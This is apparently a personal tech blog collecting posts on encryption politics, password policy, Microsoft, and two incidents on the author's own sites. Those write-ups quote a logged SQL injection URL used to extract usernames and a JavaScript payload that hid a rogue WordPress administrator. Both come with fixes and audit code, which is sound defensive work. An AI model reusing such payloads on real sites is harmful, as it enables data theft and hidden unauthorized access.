Encryption

Looks like the government is at it again now that Apple has come out stating that they are not going to roll over and provide a master key to their iPhone software. Really, NSA? How about the part where the terrorists didn’t use encryption in these attacks?

European media outlets are reporting that the location of a raid conducted on a suspected safe house Wednesday morning was extracted from a cellphone, apparently belonging to one of the attackers, found in the trash outside the Bataclan concert hall where the massacre took place. Le Monde reported that investigators were able to access the data on the phone, including a detailed map of the concert hall and an SMS message saying “we’re off; we’re starting.” Police were also able to trace the phone’s movements.

Why this matters

I know that there are a lot of people out there who think our government can do no wrong and that national security is the most important thing it can do. But there is a lawful way to handle this. The 4th Amendment to the Constitution should protect us from the massive surveillance systems that the government has put in place since 9/11. Yes, what happened on that day was horrible, and I’m still as pissed about it now as I was then. But I’m more upset at the erosion of our rights as politicians and government officials put in more programs to watch our electronic communications en masse.

Several companies have either released statements or made comments on the current state of encryption and working with the government in these matters. My company has stated this:

We condemn terrorism and have total solidarity with victims of terror. Those who seek to praise, promote, or plan terrorist acts have no place on our services. We also appreciate the difficult and essential work of law enforcement to keep people safe. When we receive lawful requests from these authorities we comply. However, we will continue to fight aggressively against requirements for companies to weaken the security of their systems. These demands would create a chilling precedent and obstruct companies’ efforts to secure their products.

Tim Cook and Apple have their letter which ends with:

Opposing this order is not something we take lightly. We feel we must speak up in the face of what we see as an overreach by the U.S. government.

We are challenging the FBI’s demands with the deepest respect for American democracy and a love of our country. We believe it would be in the best interest of everyone to step back and consider the implications.

While we believe the FBI’s intentions are good, it would be wrong for the government to force us to build a backdoor into our products. And ultimately, we fear that this demand would undermine the very freedoms and liberty our government is meant to protect.

So encrypt your backups and use HTTPS whenever possible. Set really difficult passwords and use a password manager like LastPass so you don’t forget them. Remember folks, just because you have nothing to hide doesn’t mean you shouldn’t care about this subject. One person in particular who has brought more to light on the intrusions into our lives put it best:

If you think privacy is unimportant for you because you have nothing to hide, you might as well say free speech is unimportant for you because you have nothing useful to say.

–Edward Snowden

SQL exploits

You know it’s going to be a bad day when you get the following email:

Did someone hack our website? It looks like a Chinese news listing entry has been added with today’s date.

Ballsack!

Time to roll up the sleeves. How bad is the damage?

From the looks of it, other sites on the web server had not been damaged. A search for modified files turned up nothing out of the ordinary: log files had changed, sure, but nothing else. A search through the web logs for the site showed that this appeared to be an attack on the site’s Content Management System (CMS).

Whichever jackass wrote that code should be beaten! Get the torches and pitchforks, death to the programmer!! Oh wait, that was me. Death to the evil script kiddie that attacked my beautiful code!!!!!!!!!

Searching through the logs, I started seeing some interesting entries, a bunch of them with variations such as this:

http://unigleeclub.com/news.phtml?id=-999.9%20UNION%20ALL%20SELECT%200x31303235343830303536,(SELECT%20concat(0x7e,0x27,Hex(cast(user.username%20as%20char)),0x27,0x7e)%20FROM%20`gleeclub`.user%20LIMIT%203,1)%20,0x31303235343830303536,0x31303235343830303536--

This one came after a lot of earlier hits from the attacker, first figuring out the tables and then getting down to the nitty-gritty of pulling out a username and password.

The issue was that I had forgotten to sanitize my input. Like a jackass, I didn’t check that $id was actually an integer, so when they ran their script they were able to pull out a hex string that tools such as this site can easily translate back into text.

The Quick Fix

I put in two fixes to ensure that we were dealing with an integer value here. First, I did some simple math on the variable, which changes its type if it is not an integer.

$id = $id+0;

If you have a string, you’ll get back a zero. If you have an integer value, you’re good to go.

I also expanded the if statement wrapping the code that grabs the specific news item. Instead of just checking whether $id was set, I now check that it is set and greater than zero, another layer to ensure that we have a number instead of a string of text.

//Before:
if(isset($id) && $id != "")

//After:
if(isset($id) && $id != "" && $id > 0)
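As an added example (not the CMS code from the post), here is the same lookup done so that the id is validated as a positive integer and bound as a query parameter instead of being interpolated into the SQL. It assumes PHP 7.1 or later, a PDO connection and a `news` table with an integer `id` column; none of those come from the post.

```php
<?php
// Added example, not the CMS code from the post. Assumes PHP >= 7.1, a PDO
// connection passed in as $pdo, and a `news` table with an integer `id` column.

// Accept only a whole number greater than zero; everything else becomes null.
// FILTER_VALIDATE_INT rejects "-999.9 UNION ...", "12abc" and "" outright,
// whereas "$id + 0" keeps a leading number (-999.9 for the logged payload) and,
// on PHP 8, throws a TypeError for a wholly non-numeric string instead of 0.
function newsId($raw): ?int
{
    if (is_array($raw)) {                      // ?id[]=1 is never a valid id
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Fetch one row with a bound parameter, so the value never becomes SQL text
// even though it has already been validated.
function fetchNews(PDO $pdo, $raw): ?array
{
    $id = newsId($raw);
    if ($id === null) {
        return null;                           // the "not set / not > 0" branch
    }
    $stmt = $pdo->prepare('SELECT id, title, body FROM news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: a normal id, the start of the payload from the log, and
// the edge cases that the old isset()/!= "" check let through.
$cases = [
    ['42',                      42],
    ['-999.9 UNION ALL SELECT', null],
    ['12abc',                   null],
    ['',                        null],
    ['0',                       null],
    [['1'],                     null],
];
foreach ($cases as [$input, $expected]) {
    if (newsId($input) !== $expected) {
        throw new RuntimeException('unexpected result for ' . json_encode($input));
    }
}
echo "all id checks passed\n";
```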

We’re all human and humans make mistakes. This code that was exploited was written 8 years ago at a time when I should have known better, but missed it. It lived in the wild up until last year when it was finally exploited. I’m lucky that it took that long for it to expose itself, but kind of embarrassed that it was there in the first place. While I tend to come down hard on people for not doing these sorts of things, it’s only because I’ve learned my lesson the hard way and have seen people continually mess this stuff up. While this happened to me a while ago, I’ve had friends get bit by this very recently so I figured it was time to finish off this post and get it out the door. An ounce of prevention sort of thing.

To learn more about SQL injection attacks, here is a good article by Bhanu Mahesh on Quality Software Connection on how to prevent them.


20%

We launched our Hosted Exchange 2007 Product just over a year ago. And for the most part, things have gone great.

One of our early decisions was to balance the security of the system against making the system as user friendly as possible. Originally, we had a pretty strict password policy. We soon found that many of our customers were not too happy with this policy and thought it was too much. Were we out-of-control security freaks? Shouldn’t the customer appreciate the steps we are taking to secure not only our servers, but their information?

Looking around at other vendors, we quickly found that we may have been a bit too harsh. Take Gmail for example. Sure, it’s not Exchange, but then again it has over 100 million users. If they have had massive issues with security and hacking, they clearly have them under control behind the scenes, since things have not gotten out of hand.

And have you ever been prompted to change your password on Gmail? I haven’t.

So we compromised. We altered the interval before the system forces you to change your password. We altered the number of passwords that you could recycle. And we also added a somewhat buried feature in our customer portal: ‘allow passwords to never expire’.

Holy crap! Let’s just blow a huge freaking hole in the security system shall we.

This was a feature we were not all that happy about, but with the other measures in place we figured we would avoid passwords such as abc123. It makes the end user happy, and we have some level of security, though not as high and tight as we would like. But it’s better than having things wide open.

Now here is the shocking part. 20% of our users have this feature enabled. 20-freaking-percent! I was really hoping for this number to be in the 5-10% range. But no, 1 in 5 of our users will never change their password again.

Or will they?

I’m currently developing a nag script that will send out a reminder to the end users every couple of months. Not enough to completely annoy the heck out of them, but hopefully enough to get a good portion of that 20% to change their passwords on a semi-regular basis.

So what do you do for your password policy? Leave your tips and tricks in the comments section. We’d like to hear what you think is an acceptable policy to stay secure!

WordPress Security Concern

I’m not sure if you’ve applied the latest updates for WordPress, but I did last week. However, it appears that someone got into one of the blogs that I manage and created an account for themselves. They didn’t do anything with it, but they DID have full admin access. I’m assuming this was due to a security bug in 2.8.3, as they got in while that version was on the server.

So patch your servers if you haven’t already!

Here’s how I noticed that the person had gotten in. I was doing an audit of the users on the site and noticed that the count next to Administrators stated there were 3 admins for the site. However, when I viewed the list, there were only 2 on the page. Taking a look in the database, I noticed a user with a goofy name set up as an admin. And peeking in the wp_usermeta table, I noticed the following attribute was assigned to their first name:

        for (var i = 0; i < tags.length; i++) {
            var t = tags[i].innerHTML;
            var h = tags[i];
            // Rewrites the text of any tag whose contents mention s,
            // knocking the leading number down by one
            if (t.indexOf(s) > 0) {
                s = (parseInt(t) - 1) + s;
                h.removeChild(h.firstChild);
                t = document.createTextNode(s);
                h.appendChild(t);
            }
        }
        // Decrements the "Administrator (N)" count shown in the role filter links
        var arr = document.getElementsByTagName("ul");
        for (var i in arr) if (arr[i].className == "subsubsub") {
            var n = />Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
            if (n[1] > 0) {
                var txt = arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi, ">Administrator (" + (n[1] - 1) + ")<");
                arr[i].innerHTML = txt;
            }
        }
    } catch (e) {}
};
addLoadEvent(setUserName);

It’s not formatted the greatest, but basically it hides the username from the list. Nice, eh! Simply deleting this entry made the user show up in the user list, where I was able to do some auditing before blowing away the user.

So audit your admin list and patch your servers! This could have been a lot worse if they had started defacing the site or hiding other gems on there.

-Matt
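As an added audit script (not from the post), this reads the administrator list straight out of the database and flags profile fields that carry markup or script, so a DOM-rewriting payload like the one above has nothing to hide behind. It assumes the default `wp_` table prefix and takes connection details from `WP_DSN`, `WP_DB_USER` and `WP_DB_PASS` environment variables, which are placeholders rather than values from the post.

```php
<?php
// Added audit script, not from the post. Lists administrators from wp_usermeta
// rather than the admin screen, and flags profile fields holding markup/script.
// Assumes the default "wp_" table prefix and connection details in the WP_DSN,
// WP_DB_USER and WP_DB_PASS environment variables (placeholders, not values
// from the post).

$prefix = 'wp_';
$pdo = new PDO(
    getenv('WP_DSN') ?: 'mysql:host=127.0.0.1;dbname=wordpress;charset=utf8mb4',
    getenv('WP_DB_USER') ?: 'wp_audit',
    getenv('WP_DB_PASS') ?: ''
);
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Administrators according to the database, not according to the admin screen.
// wp_capabilities holds a serialized array, so the role appears as a quoted key.
function listAdmins(PDO $pdo, string $prefix): array
{
    $sql = "SELECT u.ID, u.user_login, u.user_email, u.user_registered
              FROM {$prefix}users u
              JOIN {$prefix}usermeta m ON m.user_id = u.ID
             WHERE m.meta_key = '{$prefix}capabilities'
               AND m.meta_value LIKE '%\"administrator\"%'
             ORDER BY u.ID";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Profile meta that contains markup where only plain text belongs. The post's
// payload sat in first_name; the other keys are the same kind of field.
function suspiciousProfileMeta(PDO $pdo, string $prefix): array
{
    $sql = "SELECT user_id, meta_key, LEFT(meta_value, 80) AS sample
              FROM {$prefix}usermeta
             WHERE meta_key IN ('first_name', 'last_name', 'nickname', 'description')
               AND (meta_value LIKE '%<%' OR meta_value LIKE '%innerHTML%'
                    OR meta_value LIKE '%addLoadEvent%')";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

$admins = listAdmins($pdo, $prefix);
printf("%d administrator account(s) in the database:\n", count($admins));
foreach ($admins as $a) {
    printf("  #%-4d %-20s %-30s registered %s\n",
           $a['ID'], $a['user_login'], $a['user_email'], $a['user_registered']);
}
foreach (suspiciousProfileMeta($pdo, $prefix) as $m) {
    printf("SUSPICIOUS %s for user #%d: %s\n", $m['meta_key'], $m['user_id'], $m['sample']);
}
```

Compare the printed count with the number of administrators the WordPress users screen shows; any difference is an account the page is not displaying.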

Business as usual

Over the past couple of years, I have been able to tolerate Microsoft a bit more than I used to. When your primary income relies on people purchasing Exchange and OCS accounts that you provide the back end provisioning and automation for, you quickly realize where your bread is buttered.

But this sort of crap really needs to stop. Yes, it’s their operating system. But that doesn’t excuse installing add-ons into third-party applications and disabling the uninstall option. I’m with the writer of this article: this is a great way to get your customers to not trust you, and precisely the reason I haven’t had Windows on my desktop for 8 years.

A routine security update for a Microsoft Windows component installed on tens of millions of computers has quietly installed an extra add-on for an untold number of users surfing the Web with Mozilla’s Firefox Web browser.

Earlier this year, Microsoft shipped a bundle of updates known as a “service pack” for a programming platform called the Microsoft .NET Framework, which Microsoft and plenty of third-party developers use to run a variety of interactive programs on Windows.

The service pack for the .NET Framework, like other updates, was pushed out to users through the Windows Update Web site. A number of readers had never heard of this platform before Windows Update started offering the service pack for it, and many of you wanted to know whether it was okay to go ahead and install this thing. Having earlier checked to see whether the service pack had caused any widespread problems or interfered with third-party programs — and not finding any that warranted waving readers away from this update — I told readers not to worry and to go ahead and install it.

source